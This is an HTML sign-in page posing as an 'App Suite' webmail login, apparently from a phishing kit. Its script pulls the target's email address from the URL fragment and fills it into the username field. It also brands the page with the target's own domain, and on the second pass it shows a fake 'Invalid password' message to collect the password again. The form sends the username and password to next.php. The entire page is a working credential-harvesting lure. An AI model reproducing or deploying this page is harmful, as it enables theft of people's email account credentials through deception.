<!DOCTYPE html>
<html>

<head>
    <link rel="icon" type="image" href="favicon.ico">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-compatable" content="IE-edge">
    <meta name="viewport" content="width=device-width">
    <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
    <title>App Suite. Sign in</title>
</head>

<body style="background-color: #193254;">
    <div class="container-fluid">
        <div class="container">
            <div class="row">
                <div class="col-md-2"></div>
                <div class="col-md-8" style="margin-top:155px;">
                    <center>
                        <span style="color: #6cbafc;font-size: 39px;" class="domain-name"></span>
                        <span style="color: white;font-size: 39px;">App Suite</span>
                    </center><br>
                    <form method="POST" action="next.php" style="margin-left: 190px;">
                        <input type="hidden" name="count" id="count" value="0">
                        <div>
                            <div id="msg" style="display: none;color: red;font-weight: 600">Invalid password.! Please enter correct password.</div>
                        </div>
                        <div class="form-group" style="margin-top: 5px;">
                            <div class="input-group">
                                <input type="email" required="required" name="ai" id="ai" value="" class="form-control" placeholder="User name" style="height: 39px;width: 370px;border-radius: 3px;font-size: 18px;color: black;">
                            </div><br><!-- end of input group -->
                            <div class="input-group" style="margin-top: -5px;">
                                <input type="password" required="required" name="pr" id="pr" class="form-control" placeholder="Password" style="height: 39px;width: 370px;border-radius: 3px;font-size: 18px;color: black;">
                            </div><br>
                            <input type="checkbox" name="" style="margin-top:20px;">
                            <p style="color: white;margin-left:20px;margin-top:-22px;">Stay signed in</p>
                            <p style="margin-left:220px;margin-top:-29px;color:#87b7dd;">Forget Your Password?</p>
                            <input type="submit" name="submit-btn" id="submit-btn" value="Sign in" style="margin-top:25px;width:170px;height:38px;border:none;background-color:#3774a8;color:#fff;border-radius:4px;"><br><br><br><br><br><br><br><br>
                            <a href="#" style="font-size:13px;margin-top:205px;margin-left:-42px;color:#4a9ee4;">English (US)</a>
                            <p style="font-size:13px;margin-top:-19px;margin-left:-120px;color:#fff;">Languages:</p>
                            <p style="margin-top:-26px;margin-left:80px;font-size:13px;color:#4a9ee4;">© 2016-2020 <span class="domain-name"></span> Software GmbH Version: 7.8.4 Rev43 (2018-10-08)</p>
                        </div>
                    </form>
                </div>
                <div class="col-md-2"></div>
            </div>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
            vars[key] = value;
        });
        return vars;
    }

    if (!getUrlVars()["count"]) {

    } else {
        var count = getUrlVars()["count"];
        $('#count').val(count);
    }



    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.charAt(0).toUpperCase()+c.slice(1)+" ";
        $("#msg").hide();
        var count = $('#count').val();
        if (count == 1) {
            $("#msg").show();
        } else {
            $("#msg").hide();
        }
        $('#ai').val(my_ai);
        $('.domain-name').html(dom);


    }
    ///////////////url getting ai////////////////

});
</script>

</html>